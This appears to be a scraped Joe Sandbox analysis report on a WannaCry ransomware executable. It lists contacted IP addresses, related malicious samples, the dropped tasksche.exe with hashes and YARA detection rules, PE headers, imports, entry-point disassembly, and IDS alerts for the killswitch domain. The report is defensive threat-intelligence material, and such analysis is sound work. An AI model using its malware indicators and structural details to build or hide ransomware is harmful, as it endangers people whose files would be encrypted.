                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.32
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.31
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  202.159.55.243
                  unknownIndonesia
                  9340INDONET-AS-APINDOInternetPTIDfalse
                  6.78.103.79
                  unknownUnited States
                  1464DNIC-ASBLK-01464-01465USfalse
                  79.17.98.235
                  unknownItaly
                  3269ASN-IBSNAZITfalse
                  35.30.149.109
                  unknownUnited States
                  36375UMICH-AS-5USfalse
                  100.17.242.81
                  unknownUnited States
                  701UUNETUSfalse
                  110.193.28.163
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  107.165.99.29
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  94.50.20.26
                  unknownRussian Federation
                  12389ROSTELECOM-ASRUfalse
                  107.165.99.28
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  106.37.240.93
                  unknownChina
                  4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                  165.36.48.73
                  unknownUnited States
                  37053RSAWEB-ASZAfalse
                  208.141.91.81
                  unknownUnited States
                  3561CENTURYLINK-LEGACY-SAVVISUSfalse
                  19.230.119.198
                  unknownUnited States
                  3MIT-GATEWAYSUSfalse
                  63.218.23.184
                  unknownUnited States
                  3491BTN-ASNUSfalse
                  141.72.227.114
                  unknownGermany
                  553BELWUEBelWue-KoordinationEUfalse
                  104.23.8.55
                  unknownUnited States
                  13335CLOUDFLARENETUSfalse
                  44.103.39.120
                  unknownUnited States
                  64218MIDSNETUSfalse
                  125.116.173.102
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  107.165.99.27
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  45.162.96.222
                  unknownBrazil
                  268506DelhaBarbosadeCarvalho-MEBRfalse
                  186.78.10.86
                  unknownChile
                  7418TELEFONICACHILESACLfalse
                  107.165.99.26
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  23.235.144.243
                  unknownUnited States
                  132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                  107.165.99.25
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.24
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  116.183.194.174
                  unknownChina
                  137539UNICOM-HARBIN-IDCChinaUnicomCNfalse
                  107.165.99.23
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  168.116.192.0
                  unknownUnited States
                  36026AS-CHI-CORPUSfalse
                  107.165.99.22
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.21
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  82.18.231.170
                  unknownUnited Kingdom
                  5089NTLGBfalse
                  183.6.2.144
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  107.165.99.20
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  71.56.230.138
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  162.93.150.225
                  unknownUnited States
                  6949CHARLES-SCHWABUSfalse
                  158.231.98.142
                  unknownFrance
                  36351SOFTLAYERUSfalse
                  36.219.187.50
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  140.121.180.180
                  unknownTaiwan; Republic of China (ROC)
                  38847NCHU-AS-TWNationalChungHsingUniversityTWfalse
                  107.165.99.19
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.18
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  132.6.47.46
                  unknownUnited States
                  385AFCONC-BLOCK1-ASUSfalse
                  96.155.150.196
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  107.165.99.17
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  151.86.198.27
                  unknownItaly
                  8217ASN-ENIITfalse
                  134.48.98.26
                  unknownUnited States
                  1736MU-ASUSfalse
                  174.48.76.49
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  179.84.122.232
                  unknownBrazil
                  26599TELEFONICABRASILSABRfalse
                  54.35.48.14
                  unknownUnited States
                  14618AMAZON-AESUSfalse
                  75.204.201.85
                  unknownUnited States
                  22394CELLCOUSfalse
                  196.123.124.117
                  unknownMorocco
                  36925ASMediMAfalse
                  74.51.185.24
                  unknownUnited States
                  30055CROSSLAKECOMMUNICATIONSUSfalse
                  169.6.177.201
                  unknownUnited States
                  203CENTURYLINK-LEGACY-LVLT-203USfalse
                  105.23.110.116
                  unknownMauritius
                  37100SEACOM-ASMUfalse
                  107.165.99.52
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.51
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.50
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  133.249.8.151
                  unknownJapan17947S-UTOPIASAKURAKCSCorporationJPfalse
                  8.227.163.150
                  unknownUnited States
                  396238FAIRLAWNGIG-NETUSfalse
                  150.22.248.39
                  unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  116.139.36.17
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  193.208.55.224
                  unknownFinland
                  1759TSF-IP-CORETeliaFinlandOyjEUfalse
                  107.152.120.142
                  unknownUnited States
                  7782ALSK-7782USfalse
                  107.165.99.59
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.58
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  139.164.186.167
                  unknownNorway
                  29695ALTIBOX_ASNorwayNOfalse
                  107.165.99.57
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  107.165.99.56
                  unknownUnited States
                  18779EGIHOSTINGUStrue
                  IP
                  192.168.2.148
                  192.168.2.149
                  192.168.2.146
                  192.168.2.147
                  192.168.2.140
                  192.168.2.141
                  192.168.2.144
                  192.168.2.145
                  192.168.2.142
                  192.168.2.143
                  192.168.2.159
                  192.168.2.157
                  192.168.2.158
                  192.168.2.151
                  192.168.2.152
                  192.168.2.150
                  192.168.2.155
                  192.168.2.156
                  192.168.2.153
                  192.168.2.154
                  Joe Sandbox Version:37.1.0 Beryl
                  Analysis ID:860906
                  Start date and time:2023-05-08 05:33:51 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 25s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:stN592INV6.exe
                  Original Sample Name:2023-05-07_31510bd9b6f5c297c64492ab86aacaa1_wannacry.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.expl.evad.winEXE@4/1@2/100
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 99.4% (good quality ratio 90.1%)
                  • Quality average: 76.7%
                  • Quality standard deviation: 32.6%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: stN592INV6.exe
                  No simulations
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comFn0ldcwYp5.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  fRUk5kt31I.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  xiQJ4AR6kS.exeGet hashmaliciousVirut, WannacryBrowse
                  • 104.17.244.81
                  Qy6oOsX62L.exeGet hashmaliciousVirut, WannacryBrowse
                  • 104.17.244.81
                  LX5kd65cMq.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  Win32.Wannacry.exeGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                  • 104.16.173.80
                  Ni7LJQgu5C.dllGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  9hFrDoD0UH.dllGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  zMxKF1sZ6K.dllGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  mbXvGlj2dR.dllGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  8YjgkMEKt4.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  w7pN61jwPu.exeGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  9lCJpl7Hsk.dllGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  qvV34ruRr1.exeGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  GzOXKM2kuA.dllGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  KIsgbS7n3c.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  MSNRf9dZ63.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  1jGr1mY0jf.exeGet hashmaliciousWannacryBrowse
                  • 104.17.244.81
                  RE8WkQYyxM.exeGet hashmaliciousWannacryBrowse
                  • 104.16.173.80
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  EGIHOSTINGUSTifzk5S9Dp.elfGet hashmaliciousMiraiBrowse
                  • 107.187.145.87
                  PNUGTuZahh.elfGet hashmaliciousMirai, MoobotBrowse
                  • 192.177.179.39
                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 45.38.47.103
                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 45.38.47.103
                  Order_confirmation_is_attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                  • 166.88.175.35
                  DHL_2017128_Receipt_Document,pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 45.38.47.103
                  tMisSkMPIB.elfGet hashmaliciousUnknownBrowse
                  • 142.253.6.87
                  2nkKFdYrrU.elfGet hashmaliciousMiraiBrowse
                  • 23.230.101.4
                  cujr1d9Bx1.elfGet hashmaliciousMirai, MoobotBrowse
                  • 107.187.9.96
                  gpzisBB3c6.elfGet hashmaliciousMiraiBrowse
                  • 136.0.81.166
                  b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                  • 104.164.245.6
                  jklarm-20230428-0950.elfGet hashmaliciousMiraiBrowse
                  • 166.88.8.150
                  2eO25tyqpJ.elfGet hashmaliciousMiraiBrowse
                  • 104.165.179.61
                  x86.elfGet hashmaliciousMiraiBrowse
                  • 107.164.205.115
                  cOvvOLLVKg.elfGet hashmaliciousMiraiBrowse
                  • 45.39.166.146
                  RH7j5wEmQg.elfGet hashmaliciousMiraiBrowse
                  • 104.253.157.72
                  XKrr6G6f5E.elfGet hashmaliciousMiraiBrowse
                  • 166.93.129.89
                  KMqGoudziq.elfGet hashmaliciousUnknownBrowse
                  • 107.164.241.10
                  W47rLMtUVo.elfGet hashmaliciousMiraiBrowse
                  • 107.164.204.25
                  zF0csZp14G.elfGet hashmaliciousMiraiBrowse
                  • 172.120.223.168
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Windows\tasksche.exeonq54JS79W.exeGet hashmaliciousWannacryBrowse
                    mbXvGlj2dR.dllGet hashmaliciousWannacryBrowse
                      MSNRf9dZ63.exeGet hashmaliciousWannacryBrowse
                        7Qu8thR7WW.dllGet hashmaliciousWannacry, VirutBrowse
                          MSmReFKunQ.dllGet hashmaliciousWannacryBrowse
                            kXpnLUmuU2.dllGet hashmaliciousWannacryBrowse
                              TigrxMihsc.dllGet hashmaliciousWannacryBrowse
                                iTQzi9bir4.dllGet hashmaliciousWannacryBrowse
                                  5nuyzrvshp.dllGet hashmaliciousVirut, WannacryBrowse
                                    JJuyd5UnAs.dllGet hashmaliciousWannacry, VirutBrowse
                                      OiE7MtX6tI.dllGet hashmaliciousWannacry, VirutBrowse
                                        FFrKRs5Q7y.dllGet hashmaliciousWannacryBrowse
                                          rQJydZ0McE.dllGet hashmaliciousWannacryBrowse
                                            svRn7r2Rty.dllGet hashmaliciousWannacry, VirutBrowse
                                              O9KOr4E9LK.dllGet hashmaliciousWannacry, VirutBrowse
                                                rvmsgjuGfo.dllGet hashmaliciousWannacryBrowse
                                                  ovoq6aoWTi.dllGet hashmaliciousWannacry, VirutBrowse
                                                    fxyKXb2hV5.dllGet hashmaliciousWannacryBrowse
                                                      YsoENGep0M.dllGet hashmaliciousWannacryBrowse
                                                        oap4r2jjhD.dllGet hashmaliciousWannacryBrowse
                                                          Process:C:\Users\user\Desktop\stN592INV6.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3514368
                                                          Entropy (8bit):7.996072890929898
                                                          Encrypted:true
                                                          SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2Hj:QqPe1Cxcxk3ZAEUadzR8yc4Hj
                                                          MD5:7F7CCAA16FB15EB1C7399D422F8363E8
                                                          SHA1:BD44D0AB543BF814D93B719C24E90D8DD7111234
                                                          SHA-256:2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD
                                                          SHA-512:83E334B80DE08903CFA9891A3FA349C1ECE7E19F8E62B74A017512FA9A7989A0FD31929BF1FC13847BEE04F2DA3DACF6BC3F5EE58F0E4B9D495F4B9AF12ED2B7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\tasksche.exe, Author: Joe Security
                                                          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                                                          • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 98%
                                                          Joe Sandbox View:
                                                          • Filename: onq54JS79W.exe, Detection: malicious, Browse
                                                          • Filename: mbXvGlj2dR.dll, Detection: malicious, Browse
                                                          • Filename: MSNRf9dZ63.exe, Detection: malicious, Browse
                                                          • Filename: 7Qu8thR7WW.dll, Detection: malicious, Browse
                                                          • Filename: MSmReFKunQ.dll, Detection: malicious, Browse
                                                          • Filename: kXpnLUmuU2.dll, Detection: malicious, Browse
                                                          • Filename: TigrxMihsc.dll, Detection: malicious, Browse
                                                          • Filename: iTQzi9bir4.dll, Detection: malicious, Browse
                                                          • Filename: 5nuyzrvshp.dll, Detection: malicious, Browse
                                                          • Filename: JJuyd5UnAs.dll, Detection: malicious, Browse
                                                          • Filename: OiE7MtX6tI.dll, Detection: malicious, Browse
                                                          • Filename: FFrKRs5Q7y.dll, Detection: malicious, Browse
                                                          • Filename: rQJydZ0McE.dll, Detection: malicious, Browse
                                                          • Filename: svRn7r2Rty.dll, Detection: malicious, Browse
                                                          • Filename: O9KOr4E9LK.dll, Detection: malicious, Browse
                                                          • Filename: rvmsgjuGfo.dll, Detection: malicious, Browse
                                                          • Filename: ovoq6aoWTi.dll, Detection: malicious, Browse
                                                          • Filename: fxyKXb2hV5.dll, Detection: malicious, Browse
                                                          • Filename: YsoENGep0M.dll, Detection: malicious, Browse
                                                          • Filename: oap4r2jjhD.dll, Detection: malicious, Browse
                                                          Reputation:moderate, very likely benign file
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.9449540358183635
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:stN592INV6.exe
                                                          File size:3751936
                                                          MD5:31510bd9b6f5c297c64492ab86aacaa1
                                                          SHA1:95f2b6d6fa1c48d71d2154270ba77aa3af74adc1
                                                          SHA256:011c24bce46c2ded7236482e0e36530dd27c937e31a0896e91659d9acd7ceb69
                                                          SHA512:7795c6e630e5ac91f96683ff64eff8550111f75ea76e992eb8be9c4bc70c5fdcc1daab34b035dde7b16fb658eb660c9b33e3822df47e89a39c63f446d30aad1c
                                                          SSDEEP:98304:qDqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2H:qDqPe1Cxcxk3ZAEUadzR8yc4H
                                                          TLSH:C8063394612CB2FCF0440EB44473896AB7B33C69A7BA5E1F9BC086670D53B5BAFD0641
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..
                                                          Icon Hash:00828e8e8686b000
                                                          Entrypoint:0x409a16
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:
                                                          Time Stamp:0x49F482D1 [Sun Apr 26 15:50:41 2009 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:9ecee117164e0b870a53dd187cdd7174
                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          push FFFFFFFFh
                                                          push 0040A1A0h
                                                          push 00409BA2h
                                                          mov eax, dword ptr fs:[00000000h]
                                                          push eax
                                                          mov dword ptr fs:[00000000h], esp
                                                          sub esp, 68h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov dword ptr [ebp-18h], esp
                                                          xor ebx, ebx
                                                          mov dword ptr [ebp-04h], ebx
                                                          push 00000002h
                                                          call dword ptr [0040A0C0h]
                                                          pop ecx
                                                          or dword ptr [0070F894h], FFFFFFFFh
                                                          or dword ptr [0070F898h], FFFFFFFFh
                                                          call dword ptr [0040A0C8h]
                                                          mov ecx, dword ptr [0070F88Ch]
                                                          mov dword ptr [eax], ecx
                                                          call dword ptr [0040A0CCh]
                                                          mov ecx, dword ptr [0070F888h]
                                                          mov dword ptr [eax], ecx
                                                          mov eax, dword ptr [0040A0E4h]
                                                          mov eax, dword ptr [eax]
                                                          mov dword ptr [0070F890h], eax
                                                          call 00007F182CBC3AE1h
                                                          cmp dword ptr [00431410h], ebx
                                                          jne 00007F182CBC39CEh
                                                          push 00409B9Eh
                                                          call dword ptr [0040A0D4h]
                                                          pop ecx
                                                          call 00007F182CBC3AB3h
                                                          push 0040B010h
                                                          push 0040B00Ch
                                                          call 00007F182CBC3A9Eh
                                                          mov eax, dword ptr [0070F884h]
                                                          mov dword ptr [ebp-6Ch], eax
                                                          lea eax, dword ptr [ebp-6Ch]
                                                          push eax
                                                          push dword ptr [0070F880h]
                                                          lea eax, dword ptr [ebp-64h]
                                                          push eax
                                                          lea eax, dword ptr [ebp-70h]
                                                          push eax
                                                          lea eax, dword ptr [ebp-60h]
                                                          push eax
                                                          call dword ptr [0040A0DCh]
                                                          push 0040B008h
                                                          push 0040B000h
                                                          call 00007F182CBC3A6Bh
                                                          Programming Language:
                                                          • [C++] VS98 (6.0) SP6 build 8804
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa1e00xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3100000x362000.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x188.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x90000x9000False0.5344509548611112data6.1344811887775705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0xa0000x9980x1000False0.29345703125data3.503615586181224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xb0000x30489c0x27000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x3100000x3620000x362000unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          metjdhr0x6720000x10000x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          NameRVASizeTypeLanguageCountry
                                                          R0x3100a40x35a000PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States
                                                          RT_VERSION0x66a0a40x3b0dataEnglishUnited States
                                                          DLLImport
                                                          KERNEL32.dllWaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
                                                          ADVAPI32.dllStartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
                                                          WS2_32.dllclosesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
                                                          MSVCP60.dll??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
                                                          iphlpapi.dllGetAdaptersInfo, GetPerAdapterInfo
                                                          WININET.dllInternetOpenA, InternetOpenUrlA, InternetCloseHandle
                                                          MSVCRT.dll__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          192.168.2.6104.16.173.8049705802024298 05/08/23-05:35:39.911846TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14970580192.168.2.6104.16.173.80
                                                          192.168.2.68.8.8.849786532024291 05/08/23-05:35:39.859181UDP2024291ET TROJAN Possible WannaCry DNS Lookup 14978653192.168.2.68.8.8.8
                                                          192.168.2.68.8.8.859575532024291 05/08/23-05:35:38.893922UDP2024291ET TROJAN Possible WannaCry DNS Lookup 15957553192.168.2.68.8.8.8
                                                          104.16.173.80192.168.2.680497042031515 05/08/23-05:35:39.010206TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049704104.16.173.80192.168.2.6
                                                          104.16.173.80192.168.2.680497052031515 05/08/23-05:35:39.944324TCP2031515ET TROJAN Known Sinkhole Response Kryptos Logic8049705104.16.173.80192.168.2.6
                                                          192.168.2.6104.16.173.8049704802024298 05/08/23-05:35:38.979066TCP2024298ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 14970480192.168.2.6104.16.173.80
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          May 8, 2023 05:35:28.116609097 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.116869926 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.116947889 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.117001057 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.117050886 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.117089033 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.128632069 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.128683090 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129214048 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129254103 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129354954 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129388094 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129900932 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129940987 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.129973888 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130008936 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130043030 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130563974 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130598068 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130631924 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130667925 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130703926 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.130738020 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.131277084 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.131315947 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.131350040 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.131385088 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.131525993 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.135806084 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.135848045 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.135901928 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.136074066 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.136760950 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.136801004 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.136833906 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.136868954 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.136883974 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.136928082 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.136950016 CEST49699443192.168.2.623.0.174.90
                                                          May 8, 2023 05:35:28.137001991 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.137037992 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.137070894 CEST4434969923.0.174.90192.168.2.6
                                                          May 8, 2023 05:35:28.137073994 CEST49699443192.168.2.623.0.174.90
